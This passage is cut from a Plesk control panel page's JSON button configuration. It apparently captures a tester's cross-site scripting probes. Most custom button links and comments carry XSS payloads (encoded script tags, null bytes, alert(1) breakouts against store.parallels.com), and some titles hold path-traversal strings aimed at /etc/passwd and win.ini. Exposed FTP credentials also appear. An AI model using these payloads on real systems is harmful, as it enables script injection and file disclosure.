xss?","icon":"\/images\/custom_buttons\/{0-ed6d5ce0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"40564%253c%252fScRiPt%2520%253e32fe847420e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ed9a9700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ea1e4%253c%252fscript%253e060a7d1f2c0?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeaeb680-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0040564<\/ScRiPt%20>32fe847420e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-eeea38e0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00ea1e4<\/script>060a7d1f2c0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-effbf700-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"ca12f%2527%253b35fe7f9ef49?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-f0fd0b80-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f13fb200-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b92a7%253c%252fScRiPt%2520%253ec28bafc4b33?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f28a9120-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00b92a7<\/ScRiPt%20>c28bafc4b33?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f4050bc0-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"a812b%2527%252dalert%25281%2529%252d%25270d7822b344b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f40e9140-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"d7d63%2527%253b2f26f55ca59?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-f7bf9320-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"8692e%255c%2527%253b0d203c8e729?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-f9ba9800-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"b28c2%2527%252dalert%25281%2529%252d%252752a751e644d?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc6a8560-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fc909b60-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"88f7e%253c%252fscript%253ecf16d55fc95?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-fde50000-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0088f7e<\/script>cf16d55fc95?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-ff1f3580-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"5b27d%255c%2527%253b1ce9a941be4?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ff4a0e40-8578-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0067b340-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0150fa00-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"2b1d3%253c%252fScRiPt%2520%253e4a0c2054c2b?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-01be7940-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"853c7%253c%252fscript%253e351654a9214?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-028d90e0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%002b1d3<\/ScRiPt%20>4a0c2054c2b?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-02f64d60-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00853c7<\/script>351654a9214?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-03cc8920-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0506bea0-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"35df8%253c%252fScRiPt%2520%253ec493568736e?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-0639d000-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%0035df8<\/ScRiPt%20>c493568736e?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-0771a420-8579-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9bd966e1de55578fb","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9b2b0696f832ad89","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"fdf080d92d642275e0dcc88a","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1fdf080d9f5a4b605e4d1d3e","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with 
XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/winnt\/win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd%00XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini%00XSS Link to store.parallels.com with 
XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSS..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini%00XSS Link to store.parallels.com with XSS","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"XSS Link to store.parallels.com with XSSfdf080d955073164a20925b1","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP 